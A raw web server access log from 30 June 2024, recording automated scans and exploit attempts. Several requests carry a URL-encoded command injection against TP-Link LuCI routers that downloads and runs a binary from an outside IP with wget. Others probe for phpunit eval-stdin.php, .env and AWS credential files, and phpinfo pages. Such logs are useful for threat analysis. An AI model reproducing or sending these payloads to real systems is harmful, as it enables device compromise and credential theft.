154.118.39.158 - - [30/Jun/2024:00:44:31 +0200] "GET / HTTP/1.1" 200 1895 45.156.129.48 - - [30/Jun/2024:00:46:48 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.156.129.57 - - [30/Jun/2024:00:48:12 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [30/Jun/2024:01:20:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [30/Jun/2024:01:20:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 134.122.20.3 - - [30/Jun/2024:01:59:15 +0200] "-" 400 1930 134.122.20.3 - - [30/Jun/2024:01:59:15 +0200] "-" 400 1930 134.122.20.3 - - [30/Jun/2024:01:59:15 +0200] "GET / HTTP/1.1" 200 1895 134.122.20.3 - - [30/Jun/2024:01:59:16 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 117.208.210.37 - - [30/Jun/2024:02:23:03 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 749 87.121.69.27 - - [30/Jun/2024:02:23:17 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 77.95.92.254 - - [30/Jun/2024:04:11:29 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [30/Jun/2024:04:21:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [30/Jun/2024:04:21:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 64.62.197.187 - - [30/Jun/2024:04:29:11 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.188 - - [30/Jun/2024:04:29:39 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.183 - - [30/Jun/2024:04:29:49 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.185 - - [30/Jun/2024:04:29:55 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 206.168.32.107 - - [30/Jun/2024:04:48:53 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [30/Jun/2024:04:48:56 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [30/Jun/2024:04:48:56 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [30/Jun/2024:04:55:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [30/Jun/2024:06:26:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.62.197.65 - - [30/Jun/2024:06:49:22 +0200] "-" 400 1930 4.255.98.197 - - [30/Jun/2024:08:48:06 +0200] "GET /hudson HTTP/1.1" 404 724 194.50.16.17 - - [30/Jun/2024:09:03:04 +0200] "GET /cgi-bin/luci/ HTTP/1.1" 404 739 144.76.109.148 - - [30/Jun/2024:09:08:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.50.16.17 - - [30/Jun/2024:09:22:18 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 194.50.16.17 - - [30/Jun/2024:09:24:51 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.121.69.27 - - [30/Jun/2024:09:45:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 205.210.31.111 - - [30/Jun/2024:09:57:41 +0200] "-" 400 1930 205.210.31.111 - - [30/Jun/2024:09:57:42 +0200] "-" 400 1930 195.16.79.240 - - [30/Jun/2024:10:06:26 +0200] "GET /status/ HTTP/1.1" 404 729 195.16.79.240 - - [30/Jun/2024:10:06:26 +0200] "GET /status/ HTTP/1.1" 404 729 195.16.79.240 - - [30/Jun/2024:10:47:18 +0200] "GET /status/ HTTP/1.1" 404 729 195.16.79.240 - - [30/Jun/2024:10:47:18 +0200] "GET /status/ HTTP/1.1" 404 729 195.16.79.240 - - [30/Jun/2024:11:47:18 +0200] "GET /status/ HTTP/1.1" 404 729 195.16.79.240 - - [30/Jun/2024:11:47:19 +0200] "GET /status/ HTTP/1.1" 404 729 87.236.176.171 - - [30/Jun/2024:11:49:44 +0200] "GET / HTTP/1.1" 200 1895 163.53.219.188 - - [30/Jun/2024:12:07:35 +0200] "GET / HTTP/1.1" 200 1895 194.59.31.99 - - [30/Jun/2024:12:29:58 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 80.76.49.130 - - [30/Jun/2024:13:33:27 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 45.128.232.110 - - [30/Jun/2024:13:47:22 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 87.121.69.27 - - [30/Jun/2024:13:51:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.200 - - [30/Jun/2024:14:50:26 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 164.90.221.27 - - [30/Jun/2024:14:52:28 +0200] "GET / HTTP/1.0" 200 1895 164.90.209.46 - - [30/Jun/2024:14:52:28 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 46.101.134.86 - - [30/Jun/2024:14:52:28 +0200] "GET / HTTP/1.1" 200 1895 46.101.140.147 - - [30/Jun/2024:14:52:28 +0200] "-" 400 1930 46.101.140.147 - - [30/Jun/2024:14:52:28 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 159.89.17.225 - - [30/Jun/2024:14:52:28 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 161.35.203.108 - - [30/Jun/2024:14:52:28 +0200] "GET /v2/_catalog HTTP/1.1" 404 733 161.35.195.161 - - [30/Jun/2024:14:52:28 +0200] "-" 400 1930 46.101.140.147 - - [30/Jun/2024:14:52:28 +0200] "-" 400 1930 159.89.17.225 - - [30/Jun/2024:14:52:28 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 46.101.140.147 - - [30/Jun/2024:14:52:28 +0200] "-" 400 1930 206.168.32.101 - - [30/Jun/2024:14:53:05 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [30/Jun/2024:14:53:09 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [30/Jun/2024:14:53:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.5.117.162 - - [30/Jun/2024:14:59:11 +0200] "GET / HTTP/1.1" 200 1895 213.165.86.71 - - [30/Jun/2024:15:20:01 +0200] "-" 400 1930 213.165.86.71 - - [30/Jun/2024:15:20:02 +0200] "GET / HTTP/1.1" 200 1895 213.165.86.71 - - [30/Jun/2024:15:20:03 +0200] "GET / HTTP/1.1" 200 1895 213.165.86.71 - - [30/Jun/2024:15:20:06 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 213.165.86.71 - - [30/Jun/2024:15:20:07 +0200] "POST /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 854 213.165.86.71 - - [30/Jun/2024:15:20:07 +0200] "POST /vendor/phpunit/Util/PHP/eval-stdin.php%20/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 843 213.165.86.71 - - [30/Jun/2024:15:20:07 +0200] "POST /phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 832 213.165.86.71 - - [30/Jun/2024:15:20:08 +0200] "POST /phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 840 213.165.86.71 - - [30/Jun/2024:15:20:08 +0200] "POST /lib/phpunit/phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 848 213.165.86.71 - - [30/Jun/2024:15:20:09 +0200] "POST /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 769 213.165.86.71 - - [30/Jun/2024:15:20:09 +0200] "POST /admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 819 213.165.86.71 - - [30/Jun/2024:15:20:09 +0200] "POST /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 802 213.165.86.71 - - [30/Jun/2024:15:20:09 +0200] "POST /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 213.165.86.71 - - [30/Jun/2024:15:20:10 +0200] "POST /api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php HTTP/1.1" 404 813 213.165.86.71 - - [30/Jun/2024:15:20:10 +0200] "POST /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 213.165.86.71 - - [30/Jun/2024:15:20:10 +0200] "POST /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 808 213.165.86.71 - - [30/Jun/2024:15:20:10 +0200] "POST /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 804 213.165.86.71 - - [30/Jun/2024:15:20:11 +0200] "POST /laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 806 213.165.86.71 - - [30/Jun/2024:15:20:11 +0200] "POST /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 789 213.165.86.71 - - [30/Jun/2024:15:20:11 +0200] "POST /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 781 213.165.86.71 - - [30/Jun/2024:15:20:12 +0200] "POST /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 777 213.165.86.71 - - [30/Jun/2024:15:20:12 +0200] "POST /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 213.165.86.71 - - [30/Jun/2024:15:20:12 +0200] "POST /libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 806 213.165.86.71 - - [30/Jun/2024:15:20:12 +0200] "GET /.env HTTP/1.1" 404 722 213.165.86.71 - - [30/Jun/2024:15:20:13 +0200] "POST /.env HTTP/1.1" 404 722 213.165.86.71 - - [30/Jun/2024:15:20:13 +0200] "GET /.env.save HTTP/1.1" 404 727 213.165.86.71 - - [30/Jun/2024:15:20:13 +0200] "POST /.env.save HTTP/1.1" 404 727 213.165.86.71 - - [30/Jun/2024:15:20:14 +0200] "GET /.env.old HTTP/1.1" 404 726 213.165.86.71 - - [30/Jun/2024:15:20:14 +0200] "POST /.env.old HTTP/1.1" 404 726 213.165.86.71 - - [30/Jun/2024:15:20:14 +0200] "GET /.env.prod HTTP/1.1" 404 727 213.165.86.71 - - [30/Jun/2024:15:20:15 +0200] "POST /.env.prod HTTP/1.1" 404 727 213.165.86.71 - - [30/Jun/2024:15:20:15 +0200] "GET /.env.production HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:15 +0200] "POST /.env.production HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:16 +0200] "GET /.env.development%20 HTTP/1.1" 404 737 213.165.86.71 - - [30/Jun/2024:15:20:16 +0200] "POST /.env.development%20 HTTP/1.1" 404 737 213.165.86.71 - - [30/Jun/2024:15:20:16 +0200] "GET /laravel/.env%20 HTTP/1.1" 404 737 213.165.86.71 - - [30/Jun/2024:15:20:17 +0200] "POST /laravel/.env%20 HTTP/1.1" 404 737 213.165.86.71 - - [30/Jun/2024:15:20:17 +0200] "GET /admin-app/.env%20 HTTP/1.1" 404 739 213.165.86.71 - - [30/Jun/2024:15:20:17 +0200] "POST /admin-app/.env%20 HTTP/1.1" 404 739 213.165.86.71 - - [30/Jun/2024:15:20:18 +0200] "GET /api/.env HTTP/1.1" 404 730 213.165.86.71 - - [30/Jun/2024:15:20:18 +0200] "POST /api/.env HTTP/1.1" 404 730 213.165.86.71 - - [30/Jun/2024:15:20:18 +0200] "GET /app/.env%20 HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:18 +0200] "POST /app/.env%20 HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:19 +0200] "GET /development/.env%20 HTTP/1.1" 404 741 213.165.86.71 - - [30/Jun/2024:15:20:19 +0200] "POST /development/.env%20 HTTP/1.1" 404 741 213.165.86.71 - - [30/Jun/2024:15:20:20 +0200] "GET /apps/.env%20 HTTP/1.1" 404 734 213.165.86.71 - - [30/Jun/2024:15:20:20 +0200] "POST /apps/.env%20 HTTP/1.1" 404 734 213.165.86.71 - - [30/Jun/2024:15:20:20 +0200] "GET /cp/.env HTTP/1.1" 404 729 213.165.86.71 - - [30/Jun/2024:15:20:21 +0200] "POST /cp/.env HTTP/1.1" 404 729 213.165.86.71 - - [30/Jun/2024:15:20:21 +0200] "GET /private/.env HTTP/1.1" 404 734 213.165.86.71 - - [30/Jun/2024:15:20:21 +0200] "POST /private/.env HTTP/1.1" 404 734 213.165.86.71 - - [30/Jun/2024:15:20:22 +0200] "GET /system/.env HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:22 +0200] "POST /system/.env HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:22 +0200] "GET /redmine/.env HTTP/1.1" 404 734 213.165.86.71 - - [30/Jun/2024:15:20:23 +0200] "POST /redmine/.env HTTP/1.1" 404 734 213.165.86.71 - - [30/Jun/2024:15:20:23 +0200] "GET /docker/.env HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:23 +0200] "POST /docker/.env HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:23 +0200] "GET /cms/.env HTTP/1.1" 404 730 213.165.86.71 - - [30/Jun/2024:15:20:24 +0200] "POST /cms/.env HTTP/1.1" 404 730 213.165.86.71 - - [30/Jun/2024:15:20:24 +0200] "GET /script/.env HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:25 +0200] "POST /script/.env HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:25 +0200] "GET /live_env%20 HTTP/1.1" 404 729 213.165.86.71 - - [30/Jun/2024:15:20:25 +0200] "POST /live_env%20 HTTP/1.1" 404 729 213.165.86.71 - - [30/Jun/2024:15:20:26 +0200] "GET /application/.env HTTP/1.1" 404 738 213.165.86.71 - - [30/Jun/2024:15:20:26 +0200] "POST /application/.env HTTP/1.1" 404 738 213.165.86.71 - - [30/Jun/2024:15:20:26 +0200] "GET /.env.project%20 HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:27 +0200] "POST /.env.project%20 HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:27 +0200] "GET /.env.dist HTTP/1.1" 404 727 213.165.86.71 - - [30/Jun/2024:15:20:27 +0200] "POST /.env.dist HTTP/1.1" 404 727 213.165.86.71 - - [30/Jun/2024:15:20:28 +0200] "GET /back/.env HTTP/1.1" 404 731 213.165.86.71 - - [30/Jun/2024:15:20:28 +0200] "POST /back/.env HTTP/1.1" 404 731 213.165.86.71 - - [30/Jun/2024:15:20:28 +0200] "GET /core/.env HTTP/1.1" 404 731 213.165.86.71 - - [30/Jun/2024:15:20:29 +0200] "POST /core/.env HTTP/1.1" 404 731 213.165.86.71 - - [30/Jun/2024:15:20:29 +0200] "GET /docker/.env HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:29 +0200] "POST /docker/.env HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:20:30 +0200] "GET /fedex/.env HTTP/1.1" 404 732 213.165.86.71 - - [30/Jun/2024:15:20:30 +0200] "POST /fedex/.env HTTP/1.1" 404 732 213.165.86.71 - - [30/Jun/2024:15:20:30 +0200] "GET /__tests__/test-become/.env HTTP/1.1" 404 752 213.165.86.71 - - [30/Jun/2024:15:20:31 +0200] "POST /__tests__/test-become/.env HTTP/1.1" 404 752 213.165.86.71 - - [30/Jun/2024:15:20:31 +0200] "GET /local/.env HTTP/1.1" 404 732 213.165.86.71 - - [30/Jun/2024:15:20:31 +0200] "GET /rest/.env HTTP/1.1" 404 731 213.165.86.71 - - [30/Jun/2024:15:20:32 +0200] "POST /rest/.env HTTP/1.1" 404 731 213.165.86.71 - - [30/Jun/2024:15:20:32 +0200] "GET /shared/.env%20 HTTP/1.1" 404 736 213.165.86.71 - - [30/Jun/2024:15:20:32 +0200] "POST /shared/.env%20 HTTP/1.1" 404 736 213.165.86.71 - - [30/Jun/2024:15:20:33 +0200] "GET /sources/.env HTTP/1.1" 404 734 213.165.86.71 - - [30/Jun/2024:15:20:33 +0200] "POST /sources/.env HTTP/1.1" 404 734 213.165.86.71 - - [30/Jun/2024:15:20:33 +0200] "GET /enviroments/.env.production HTTP/1.1" 404 749 213.165.86.71 - - [30/Jun/2024:15:20:34 +0200] "POST /enviroments/.env.production HTTP/1.1" 404 749 213.165.86.71 - - [30/Jun/2024:15:20:34 +0200] "GET /enviroments/.env HTTP/1.1" 404 738 213.165.86.71 - - [30/Jun/2024:15:20:34 +0200] "POST /enviroments/.env HTTP/1.1" 404 738 213.165.86.71 - - [30/Jun/2024:15:20:35 +0200] "GET / HTTP/1.1" 200 1895 213.165.86.71 - - [30/Jun/2024:15:20:36 +0200] "POST / HTTP/1.1" 200 1895 213.165.86.71 - - [30/Jun/2024:15:20:39 +0200] "GET /frontend_dev.php/$ HTTP/1.1" 404 740 213.165.86.71 - - [30/Jun/2024:15:20:40 +0200] "GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1" 404 744 213.165.86.71 - - [30/Jun/2024:15:20:44 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 744 213.165.86.71 - - [30/Jun/2024:15:20:44 +0200] "GET /debug/default/view.html HTTP/1.1" 404 749 213.165.86.71 - - [30/Jun/2024:15:20:44 +0200] "GET /debug/default/view HTTP/1.1" 404 744 213.165.86.71 - - [30/Jun/2024:15:20:45 +0200] "GET /frontend/web/debug/default/view HTTP/1.1" 404 765 213.165.86.71 - - [30/Jun/2024:15:20:45 +0200] "GET /web/debug/default/view HTTP/1.1" 404 752 213.165.86.71 - - [30/Jun/2024:15:20:45 +0200] "GET /sapi/debug/default/view HTTP/1.1" 404 753 213.165.86.71 - - [30/Jun/2024:15:20:54 +0200] "GET /.aws/credentials HTTP/1.1" 404 738 213.165.86.71 - - [30/Jun/2024:15:21:02 +0200] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 752 213.165.86.71 - - [30/Jun/2024:15:21:02 +0200] "GET /_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 736 213.165.86.71 - - [30/Jun/2024:15:21:02 +0200] "GET /app/config/parameters.yml HTTP/1.1" 404 751 213.165.86.71 - - [30/Jun/2024:15:21:03 +0200] "GET /config/parameters.yml HTTP/1.1" 404 743 213.165.86.71 - - [30/Jun/2024:15:21:03 +0200] "GET /parameters.yml HTTP/1.1" 404 732 213.165.86.71 - - [30/Jun/2024:15:21:08 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 739 213.165.86.71 - - [30/Jun/2024:15:21:08 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 755 213.165.86.71 - - [30/Jun/2024:15:21:08 +0200] "GET /phpinfo.php HTTP/1.1" 404 729 213.165.86.71 - - [30/Jun/2024:15:21:09 +0200] "GET /info.php HTTP/1.1" 404 726 213.165.86.71 - - [30/Jun/2024:15:21:09 +0200] "GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 404 822 213.165.86.71 - - [30/Jun/2024:15:21:10 +0200] "GET /?phpinfo=1 HTTP/1.1" 200 1895 213.165.86.71 - - [30/Jun/2024:15:21:10 +0200] "GET /tool/view/phpinfo.view.php HTTP/1.1" 404 752 213.165.86.71 - - [30/Jun/2024:15:21:10 +0200] "GET /phpinfo HTTP/1.1" 404 725 213.165.86.71 - - [30/Jun/2024:15:21:10 +0200] "GET /symfony/public/_profiler/phpinfo HTTP/1.1" 404 762 213.165.86.71 - - [30/Jun/2024:15:21:11 +0200] "GET /html/phpinfo.php HTTP/1.1" 404 738 213.165.86.71 - - [30/Jun/2024:15:21:11 +0200] "GET /?phpinfo=-1 HTTP/1.1" 200 1895 213.165.86.71 - - [30/Jun/2024:15:21:11 +0200] "GET /__info.php HTTP/1.1" 404 728 213.165.86.71 - - [30/Jun/2024:15:21:12 +0200] "GET /_info-backoffice.php HTTP/1.1" 404 738 213.165.86.71 - - [30/Jun/2024:15:21:12 +0200] "GET /_info.php HTTP/1.1" 404 727 213.165.86.71 - - [30/Jun/2024:15:21:13 +0200] "GET /_phpinf.php HTTP/1.1" 404 729 213.165.86.71 - - [30/Jun/2024:15:21:13 +0200] "GET /_phpinfo.php HTTP/1.1" 404 730 213.165.86.71 - - [30/Jun/2024:15:21:13 +0200] "GET /_poopinfo.php HTTP/1.1" 404 731 213.165.86.71 - - [30/Jun/2024:15:21:14 +0200] "GET /.__info.php HTTP/1.1" 404 729 213.165.86.71 - - [30/Jun/2024:15:21:14 +0200] "GET /.info.php HTTP/1.1" 404 727 213.165.86.71 - - [30/Jun/2024:15:21:14 +0200] "GET /0.0_phpinfo.php HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:21:15 +0200] "GET /00_server_info.php HTTP/1.1" 404 736 213.165.86.71 - - [30/Jun/2024:15:21:15 +0200] "GET /02-info.php HTTP/1.1" 404 729 213.165.86.71 - - [30/Jun/2024:15:21:16 +0200] "GET /1_1_PhpInfo.php HTTP/1.1" 404 733 213.165.86.71 - - [30/Jun/2024:15:21:17 +0200] "GET / HTTP/1.1" 200 1895 213.165.86.71 - - [30/Jun/2024:15:21:27 +0200] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 404 769 91.92.247.105 - - [30/Jun/2024:15:31:39 +0200] "HEAD / HTTP/1.0" 200 - 91.92.247.105 - - [30/Jun/2024:15:31:39 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.200 - - [30/Jun/2024:15:44:43 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 20.225.3.116 - - [30/Jun/2024:16:05:14 +0200] "GET /actuator/health HTTP/1.1" 404 737 202.69.66.6 - - [30/Jun/2024:16:28:05 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 80.87.206.197 - - [30/Jun/2024:16:55:15 +0200] "GET /ui HTTP/1.1" 404 720 80.87.206.197 - - [30/Jun/2024:16:55:15 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [30/Jun/2024:17:03:14 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.81.18.156 - - [30/Jun/2024:17:19:05 +0200] "GET / HTTP/1.0" 200 1895 68.183.68.79 - - [30/Jun/2024:17:19:05 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 161.35.201.124 - - [30/Jun/2024:17:19:05 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 46.101.140.163 - - [30/Jun/2024:17:19:05 +0200] "GET /v2/_catalog HTTP/1.1" 404 733 159.89.17.225 - - [30/Jun/2024:17:19:05 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 161.35.201.124 - - [30/Jun/2024:17:19:05 +0200] "GET / HTTP/1.1" 200 1895 161.35.195.161 - - [30/Jun/2024:17:19:05 +0200] "-" 400 1930 68.183.68.79 - - [30/Jun/2024:17:19:05 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 161.35.195.161 - - [30/Jun/2024:17:19:05 +0200] "-" 400 1930 46.101.140.147 - - [30/Jun/2024:17:19:05 +0200] "-" 400 1930 161.35.195.161 - - [30/Jun/2024:17:19:05 +0200] "-" 400 1930 161.35.50.143 - - [30/Jun/2024:17:24:13 +0200] "-" 400 1930 161.35.50.143 - - [30/Jun/2024:17:24:13 +0200] "-" 400 1930 161.35.50.143 - - [30/Jun/2024:17:24:13 +0200] "GET / HTTP/1.1" 200 1895 161.35.50.143 - - [30/Jun/2024:17:24:13 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 134.209.239.171 - - [30/Jun/2024:17:41:50 +0200] "GET / HTTP/1.0" 200 1895 161.35.195.161 - - [30/Jun/2024:17:41:50 +0200] "GET /v2/_catalog HTTP/1.1" 404 733 159.89.17.225 - - [30/Jun/2024:17:41:50 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 161.35.22.53 - - [30/Jun/2024:17:41:50 +0200] "-" 400 1930 161.35.206.181 - - [30/Jun/2024:17:41:50 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 164.92.194.127 - - [30/Jun/2024:17:41:50 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 46.101.134.152 - - [30/Jun/2024:17:41:50 +0200] "GET / HTTP/1.1" 200 1895 64.226.84.171 - - [30/Jun/2024:17:41:50 +0200] "-" 400 1930 161.35.22.53 - - [30/Jun/2024:17:41:50 +0200] "-" 400 1930 164.92.194.127 - - [30/Jun/2024:17:41:50 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 161.35.22.53 - - [30/Jun/2024:17:41:50 +0200] "-" 400 1930 194.59.31.99 - - [30/Jun/2024:18:51:20 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 165.22.66.128 - - [30/Jun/2024:18:57:20 +0200] "GET / HTTP/1.0" 200 1895 46.101.134.86 - - [30/Jun/2024:18:57:20 +0200] "GET / HTTP/1.1" 200 1895 46.101.140.147 - - [30/Jun/2024:18:57:20 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 159.89.17.225 - - [30/Jun/2024:18:57:20 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 46.101.140.147 - - [30/Jun/2024:18:57:20 +0200] "-" 400 1930 164.90.209.46 - - [30/Jun/2024:18:57:20 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 161.35.203.108 - - [30/Jun/2024:18:57:20 +0200] "GET /v2/_catalog HTTP/1.1" 404 733 161.35.195.161 - - [30/Jun/2024:18:57:20 +0200] "-" 400 1930 159.89.17.225 - - [30/Jun/2024:18:57:20 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 46.101.140.147 - - [30/Jun/2024:18:57:20 +0200] "-" 400 1930 46.101.140.147 - - [30/Jun/2024:18:57:20 +0200] "-" 400 1930 45.128.232.200 - - [30/Jun/2024:19:05:48 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 94.156.8.70 - - [30/Jun/2024:19:18:52 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 87.121.69.27 - - [30/Jun/2024:19:32:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 103.124.83.105 - - [30/Jun/2024:19:50:24 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.54 - - [30/Jun/2024:19:52:25 +0200] "GET / HTTP/1.0" 200 1895 45.227.254.49 - - [30/Jun/2024:20:20:38 +0200] "-" 400 1930 149.50.103.48 - - [30/Jun/2024:20:31:59 +0200] "GET / HTTP/1.1" 200 1895 104.168.70.165 - - [30/Jun/2024:20:33:33 +0200] "GET / HTTP/1.1" 200 1895 45.58.184.181 - - [30/Jun/2024:20:58:03 +0200] "-" 400 1930 45.58.184.181 - - [30/Jun/2024:20:58:03 +0200] "-" 400 1930 45.58.184.181 - - [30/Jun/2024:20:58:03 +0200] "GET / HTTP/1.1" 200 1895 45.58.184.181 - - [30/Jun/2024:20:58:04 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 206.168.32.97 - - [30/Jun/2024:21:20:26 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.97 - - [30/Jun/2024:21:20:29 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.97 - - 